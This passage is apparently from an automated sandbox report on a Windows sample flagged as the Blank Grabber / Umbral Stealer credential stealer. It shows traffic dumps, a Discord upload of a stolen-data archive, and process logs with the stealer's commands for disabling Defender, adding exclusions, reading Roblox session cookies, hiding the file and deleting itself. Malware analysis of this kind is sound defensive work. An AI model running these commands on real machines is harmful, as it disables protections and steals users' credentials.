                                            2024-08-05 12:58:58 UTC16355OUTData Raw: 37 3b 90 a6 74 e0 2a cc 14 3b fe e9 8f b1 19 d2 88 cc 3b 82 ad 70 04 58 d2 89 1c a8 3e 39 df 52 cb 1a a1 fa d4 2b 82 7f 19 65 cd c0 8e 4a cc ae 11 34 97 8c d6 9c 13 10 31 55 7c 28 0e 43 6d 2f aa bf 7f 9e 93 1e bc ff f6 1e 9a c2 19 be 12 77 c1 30 b4 fb 3a 8e 72 f2 eb e6 b0 5f 08 ce 6f b9 f1 94 a1 03 91 48 f9 27 0a 26 e6 b7 f3 0b f7 2b dd 01 6b 68 7a 3c e2 cd c1 f3 c8 bd 40 e8 38 da 2a 04 da 2c c5 94 15 97 c4 60 3d 25 3c 98 f4 c4 bc 4d 98 c2 e1 5f 32 27 5a 06 55 75 b5 eb 94 bc 71 8b 79 f9 3d 93 8e 8b b1 fe 70 ca 72 8e 4f 5f ba da fd c7 17 02 3e 00 ef 0c 26 85 77 38 82 e3 51 6e 30 c5 ad e2 35 d1 0c 7e e7 15 c1 58 c2 3f 7c 2d af f3 7a 15 7d 3b ae cf 1a 6b 1a f0 a1 64 a8 49 cf 2b 63 35 c7 46 dc 99 27 5e ef 36 2b 47 c3 57 8a a1 cf 04 b6 15 25 b5 f0 3e 11 99 dc
                                            Data Ascii: 7;t*;;pX>9R+eJ41U|(Cm/w0:r_oH'&+khz<@8*,`=%<M_2'ZUuqy=prO_>&w8Qn05~X?|-z};kdI+c5F'^6+GW%>
                                            2024-08-05 12:58:58 UTC16355OUTData Raw: b0 76 e8 a9 28 26 14 f6 30 79 ec 71 5e 56 d0 25 2b 2c 4f 87 03 5d 2a 32 bf 83 d9 36 54 6f 86 46 7d 1a 66 d5 f8 59 12 3c f3 2d 83 83 c1 c5 91 3b cc 42 8f c8 f2 66 a6 9d c4 70 c2 ed 59 e4 af 4b 2a 3c 05 0e 29 8f e9 29 db 6e db bd 17 75 85 f5 36 bb 52 e4 05 3f d5 9e f6 e3 42 39 70 9e 4e 35 89 02 13 ed 74 9e 39 98 2f 0c b8 5d 6f bd 41 fc 3a a7 cf 8d 63 5b c0 7f 9a 57 f5 81 38 f6 71 9a 00 d2 47 a7 d9 71 99 e4 b8 ea 63 f3 a6 6d ad c3 cf 92 2f b0 cc 15 0a 72 ce 12 10 21 7a 25 ce fb 66 3a 6f 2e 3f 9a 38 41 d1 ef cf 6f 29 a6 85 5b 71 8f 1d 9b cd dd 12 7d 81 8b 6e ea be 00 7a 37 46 7f c3 14 54 4e bd b2 af 3d 33 af eb b9 10 68 2e 87 dc 9e 69 06 c2 2a 80 97 30 39 e8 f6 33 f6 f3 e1 04 d6 0c b2 8e 7d 10 b0 c1 93 ba 0b 15 13 d2 03 d1 d3 fd 40 56 1a 2d 7b 61 e3 b6 d6 af
                                            Data Ascii: v(&0yq^V%+,O]*26ToF}fY<-;BfpYK*<))nu6R?B9pN5t9/]oA:c[W8qGqcm/r!z%f:o.?8Ao)[q}nz7FTN=3h.i*093}@V-{a
                                            2024-08-05 12:58:58 UTC16355OUTData Raw: 40 51 02 14 4c 62 d7 54 00 56 54 b6 1d b6 55 e1 fb e7 c3 c0 1c ed 37 b7 2e 76 4e 86 42 e0 03 02 98 b2 92 bd b3 9d 21 87 2d 3e cf 64 12 80 27 ae 20 f5 fc 6b 87 3e cc d5 e9 50 1e e9 69 f0 c0 b3 47 17 eb 82 1a 9c 01 55 d8 ca 6d 21 4c 0d ac db ad ff 2f 06 f5 47 a5 86 16 2c 3e 6f c5 b9 fc 38 8c 2c 03 7f 76 36 00 e4 8f 37 ae 2a 10 d3 a3 ea 4a c1 45 ac c5 e7 2e 2f 1e de 18 32 d7 2e 3c 0a 1e c8 cd 40 77 bd e3 62 25 f7 e9 3c 11 2f 1c fa a5 e3 c9 d1 26 4b 1b 78 fc 6a 16 06 4a 61 3c 00 9f c2 81 37 6f 68 49 e4 87 04 ed d7 6e b9 2c 3d 71 1d 4c 2a 78 c3 4b a9 f1 16 6f 78 af 36 d9 8e 45 92 20 fc ad 92 99 e7 02 f6 b2 28 17 f3 4e d1 0a fe 5c 47 50 12 df 86 90 bb 36 a4 8e ff ee 86 3d ab 4c aa e0 b8 b9 28 07 dc c9 88 e0 f8 a8 8e 3f 82 ab 71 67 35 8d 5c aa 2a 0d dc 4b 45 06
                                            Data Ascii: @QLbTVTU7.vNB!->d' k>PiGUm!L/G,>o8,v67*JE./2.<@wb%</&KxjJa<7ohIn,=qL*xKox6E (N\GP6=L(?qg5\*KE
                                            2024-08-05 12:58:58 UTC16355OUTData Raw: 1d 55 04 2e c9 e7 64 60 f0 22 ea 28 1e d7 ed a7 4e d9 27 62 c1 bd 4e a4 a2 b3 41 3e d7 4f d4 ae 88 28 73 a5 44 8f 8f ad b4 dc e0 f9 4a 2a b3 e1 ce 66 dc f9 31 97 9b e9 78 da 68 99 98 a9 ed a7 5d ce 56 97 3d 5b ca e6 d4 a0 c6 a5 e3 6d cf 01 55 23 27 64 00 44 68 2a 26 4f 88 cd 05 30 96 4c 2a 5a f8 42 3d 60 5e 44 a8 1c 06 55 4f 0e ce 63 4f 2e bb b9 f5 e0 63 cd 99 41 8b a9 61 ce 8b 41 0f 52 b4 78 c8 33 9a c2 6a 2c bd ef 60 19 02 20 01 9c a3 90 8a 61 ec 54 7e c0 35 83 db 50 e0 6b 3d 88 76 11 34 a5 b6 ac 5a 24 22 35 c2 99 d4 0f 39 2b 0d 03 8c fb a4 84 4a f3 36 07 b3 b5 ea c0 0c 4a 0e da b3 f7 2d ab dc 48 94 72 bb 84 cb 24 b8 49 75 21 92 67 1c 6d bd 38 bc 54 58 81 d2 2e 3a d2 59 34 d3 83 df e6 80 e1 8c 30 9e f6 a3 76 57 15 b7 d9 38 a4 53 66 de 72 83 7e 13 6e 16
                                            Data Ascii: U.d`"(N'bNA>O(sDJ*f1xh]V=[mU#'dDh*&O0L*ZB=`^DUOcO.cAaARx3j,` aT~5Pk=v4Z$"59+J6J-Hr$Iu!gm8TX.:Y40vW8Sfr~n
                                            2024-08-05 12:58:59 UTC1369INHTTP/1.1 200 OK
                                            Date: Mon, 05 Aug 2024 12:58:59 GMT
                                            Content-Type: application/json
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                            x-ratelimit-limit: 5
                                            x-ratelimit-remaining: 4
                                            x-ratelimit-reset: 1722862740
                                            x-ratelimit-reset-after: 1
                                            vary: Accept-Encoding
                                            via: 1.1 google
                                            alt-svc: h3=":443"; ma=86400
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cVbktWOmo2D8GjqCEL1jxbFitZiNdP0aT5WP9vZ9qklLFAr01hTGF1KFBYpI6c9fYLNpvDigHbvbBXCuMaGQRT6VgwipygnTuaFfEeLuwYmiSHLT8%2Bp6iIBUz7I3BRDWyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            X-Content-Type-Options: nosniff
                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                            Server: cloudflare
                                            CF-RAY: 8ae6f6354a5f43f2-EWR
                                            45c
                                            {"type":0,"content":"","mentions":[],"mention_roles":[],"attachments":[{"id":"1270003120704983090","filename":"Umbral-855271.zip","size":655901,"url":"https://cdn.discordapp.com/attachments/1193832993945563176/1270003120704983090/Umbral-855271.zip?ex=66b21e13&is=66b0cc93&hm=be1e7659092c45250088e85c2a07821eee84a190c261e79b4ffa4fcffe04dc30&","proxy_url":"https://media.discordapp.net/attachments/1193832993945563176/12700031


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:08:58:00
                                            Start date:05/08/2024
                                            Path:C:\Users\user\Desktop\IDLBk4XMUa.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Users\user\Desktop\IDLBk4XMUa.exe"
                                            Imagebase:0x20096170000
                                            File size:235'008 bytes
                                            MD5 hash:AE3713305401315A3B520E84FB786FE5
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.1853846152.00000200980F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000000.1255622080.0000020096172000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000000.00000000.1255622080.0000020096172000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.1853846152.0000020097FEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1853846152.0000020097FEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:8
                                            Start time:08:58:01
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                            Wow64 process (32bit):false
                                            Commandline:"wmic.exe" csproduct get uuid
                                            Imagebase:0x7ff695ee0000
                                            File size:576'000 bytes
                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:9
                                            Start time:08:58:02
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:12
                                            Start time:08:58:03
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\attrib.exe
                                            Wow64 process (32bit):false
                                            Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\IDLBk4XMUa.exe"
                                            Imagebase:0x7ff78d730000
                                            File size:23'040 bytes
                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            General

                                            Target ID:13
                                            Start time:08:58:03
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:14
                                            Start time:08:58:03
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\IDLBk4XMUa.exe'
                                            Imagebase:0x7ff741d30000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:15
                                            Start time:08:58:03
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:17
                                            Start time:08:58:06
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                            Imagebase:0x7ff7fb730000
                                            File size:496'640 bytes
                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            General

                                            Target ID:18
                                            Start time:08:58:10
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                            Imagebase:0x7ff741d30000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:19
                                            Start time:08:58:10
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:20
                                            Start time:08:58:13
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                            Imagebase:0x7ff741d30000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:21
                                            Start time:08:58:13
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:23
                                            Start time:10:27:11
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                            Imagebase:0x7ff741d30000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:24
                                            Start time:10:27:12
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:25
                                            Start time:10:27:26
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                            Wow64 process (32bit):false
                                            Commandline:"wmic.exe" os get Caption
                                            Imagebase:0x7ff695ee0000
                                            File size:576'000 bytes
                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:26
                                            Start time:10:27:26
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:27
                                            Start time:10:27:26
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                            Wow64 process (32bit):false
                                            Commandline:"wmic.exe" computersystem get totalphysicalmemory
                                            Imagebase:0x7ff695ee0000
                                            File size:576'000 bytes
                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:28
                                            Start time:10:27:26
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:29
                                            Start time:10:27:27
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                            Wow64 process (32bit):false
                                            Commandline:"wmic.exe" csproduct get uuid
                                            Imagebase:0x7ff695ee0000
                                            File size:576'000 bytes
                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:30
                                            Start time:10:27:27
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:31
                                            Start time:10:27:28
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                            Imagebase:0x7ff741d30000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:32
                                            Start time:10:27:28
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:34
                                            Start time:10:27:44
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                            Wow64 process (32bit):false
                                            Commandline:"wmic" path win32_VideoController get name
                                            Imagebase:0x7ff695ee0000
                                            File size:576'000 bytes
                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:35
                                            Start time:10:27:44
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:36
                                            Start time:10:27:47
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:"cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\IDLBk4XMUa.exe" && pause
                                            Imagebase:0x7ff7b84d0000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            General

                                            Target ID:37
                                            Start time:10:27:47
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff75da10000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            General

                                            Target ID:38
                                            Start time:10:27:47
                                            Start date:05/08/2024
                                            Path:C:\Windows\System32\PING.EXE
                                            Wow64 process (32bit):false
                                            Commandline:ping localhost
                                            Imagebase:0x7ff70b7d0000
                                            File size:22'528 bytes
                                            MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:18.6%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:100%
                                              Total number of Nodes:3
                                              Total number of Limit Nodes:0
                                              execution_graph 37428 7ffaacea3743 37429 7ffaacea3756 CryptUnprotectData 37428->37429 37431 7ffaacea3853 37429->37431

                                              Executed Functions

                                              Function 00007FFAACCF8A1D Relevance: 7.3, Strings: 3, Instructions: 3572COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacce0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: =G_H$IG_H$cG_H
                                              • API String ID: 0-594012420
                                              • Opcode ID: 653acb65fcc28909a204c54c3d65083e37356d4f38eeefb23b49861ecb546bfd
                                              • Instruction ID: db0ccc78df2947ed69a77a44050b10107f995c9c4949bb150581ab4a60f47523
                                              • Opcode Fuzzy Hash: 653acb65fcc28909a204c54c3d65083e37356d4f38eeefb23b49861ecb546bfd
                                              • Instruction Fuzzy Hash: 5F534E7061DB458FE7A8DB18C495BAAB3E1FF99304F10856DD09EC7291DE34E846CB82
                                              Function 00007FFAACEA8586 Relevance: 4.2, Strings: 1, Instructions: 2944COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1916604695.00007FFAACEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACEA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaacea0000_IDLBk4XMUa.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: A
                                              • API String ID: 0-3554254475
                                              • Opcode ID: 0df5d71127432ab57e204b326e6254ed21145903440f9c1e1a83f9e978169f79
                                              • Instruction ID: 8566f44ac4dc7ef900990038cdfa2a777508e53c9e96f3664291b84520d5ed16
                                              • Opcode Fuzzy Hash: 0df5d71127432ab57e204b326e6254ed21145903440f9c1e1a83f9e978169f79
                                              • Instruction Fuzzy Hash: 6D33D47191D7C58FE339DB2484426A57BE0EF97705F1485BEC48ECB193DA38A80AC792
                                              Function 00007FFAACCEDFD0 Relevance: 3.6, Strings: 2, Instructions: 1052COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1961 7ffaaccedfd0-7ffaaccedfd9 1962 7ffaaccedfb3 1961->1962 1963 7ffaaccedfdb-7ffaaccedfec 1961->1963 1964 7ffaaccedfb7-7ffaaccedfc0 1962->1964 1965 7ffaaccedf5f-7ffaaccedfb2 call 7ffaacce8a28 1962->1965 1967 7ffaaccee036-7ffaaccee03b 1963->1967 1968 7ffaaccedfee-7ffaaccee019 1963->1968 1965->1964 1978 7ffaaccee0bc-7ffaaccee0bd 1967->1978 1979 7ffaaccee03d-7ffaaccee064 call 7ffaacce88f0 call 7ffaaccee072 1967->1979 1969 7ffaaccee072-7ffaaccee07b 1968->1969 1970 7ffaaccee01b-7ffaaccee01e 1968->1970 1975 7ffaaccee0c5-7ffaaccee0c9 1969->1975 1976 7ffaaccee07d-7ffaaccee09d 1969->1976 1973 7ffaaccee020-7ffaaccee022 1970->1973 1974 7ffaaccee09f-7ffaaccee0a2 1970->1974 1980 7ffaaccee024 1973->1980 1981 7ffaaccee09e 1973->1981 1984 7ffaaccee0a3 1974->1984 1975->1984 1985 7ffaaccee0cb-7ffaaccee10f 1975->1985 1982 7ffaaccee0c0-7ffaaccee0c3 1978->1982 1983 7ffaaccee0bf 1978->1983 1986 7ffaaccee066-7ffaaccee06b 1979->1986 1980->1986 1987 7ffaaccee026-7ffaaccee028 1980->1987 1981->1974 1982->1975 1983->1982 1991 7ffaaccee0a4-7ffaaccee0a9 1984->1991 1994 7ffaaccee115-7ffaaccee119 1985->1994 1995 7ffaaccee580-7ffaaccee584 1985->1995 1993 7ffaaccee06c-7ffaaccee071 1986->1993 1987->1991 1992 7ffaaccee02a 1987->1992 1996 7ffaaccee0aa-7ffaaccee0ab 1991->1996 1992->1993 1997 7ffaaccee02c-7ffaaccee02e 1992->1997 1993->1969 1998 7ffaaccee88e-7ffaaccee892 1994->1998 1999 7ffaaccee11f-7ffaaccee533 1994->1999 2000 7ffaaccee5b9-7ffaaccee5bd 1995->2000 2001 7ffaaccee586-7ffaaccee591 1995->2001 2003 7ffaaccee0ae 1996->2003 2004 7ffaaccee0ad 1996->2004 1997->1996 2008 7ffaaccee030 1997->2008 2010 7ffaaccee8c7-7ffaaccee8cb 1998->2010 2011 7ffaaccee894-7ffaaccee8b1 call 7ffaacce77f0 1998->2011 2057 7ffaaccee9b7-7ffaaccee9e6 1999->2057 2121 7ffaaccee539-7ffaaccee56a call 7ffaacce0408 1999->2121 2005 7ffaaccee5bf-7ffaaccee5cb 2000->2005 2006 7ffaaccee62c-7ffaaccee64d 2000->2006 2001->2000 2007 7ffaaccee0b0-7ffaaccee0ba 2003->2007 2004->2003 2020 7ffaaccee5d1-7ffaaccee5e4 2005->2020 2017 7ffaaccee654-7ffaaccee665 2006->2017 2007->1978 2008->1969 2016 7ffaaccee032-7ffaaccee034 2008->2016 2014 7ffaaccee938-7ffaaccee959 2010->2014 2015 7ffaaccee8cd-7ffaaccee8f6 2010->2015 2026 7ffaaccee8b6-7ffaaccee8c6 2011->2026 2024 7ffaaccee960-7ffaaccee971 2014->2024 2015->2024 2035 7ffaaccee8f8-7ffaaccee931 call 7ffaacce8a50 2015->2035 2016->1967 2016->2007 2021 7ffaaccee667 2017->2021 2022 7ffaaccee66c-7ffaaccee6f9 call 7ffaaccee9fe call 7ffaacceea51 2017->2022 2020->2017 2028 7ffaaccee5e6-7ffaaccee626 2020->2028 2021->2022 2067 7ffaaccee6ff-7ffaaccee72b 2022->2067 2068 7ffaaccee78b-7ffaaccee79b 2022->2068 2031 7ffaaccee984-7ffaaccee9b4 call 7ffaacceeaa4 call 7ffaacceeaf7 2024->2031 2032 7ffaaccee973-7ffaaccee978 2024->2032 2026->2010 2028->2006 2031->2057 2032->2031 2053 7ffaaccee936-7ffaaccee9a2 call 7ffaacceeaa4 call 7ffaacceeaf7 2035->2053 2062 7ffaaccee9ee-7ffaaccee9fd 2053->2062 2057->2062 2067->2068 2072 7ffaaccee800-7ffaaccee850 2068->2072 2073 7ffaaccee79d-7ffaaccee7fe 2068->2073 2072->1998 2073->2072 2125 7ffaaccee56f-7ffaaccee57f 2121->2125 2125->1995
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1908712741.00007FFAACCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCE0000, based on PE: false
                                              Joe Sandbox IDA Plugin
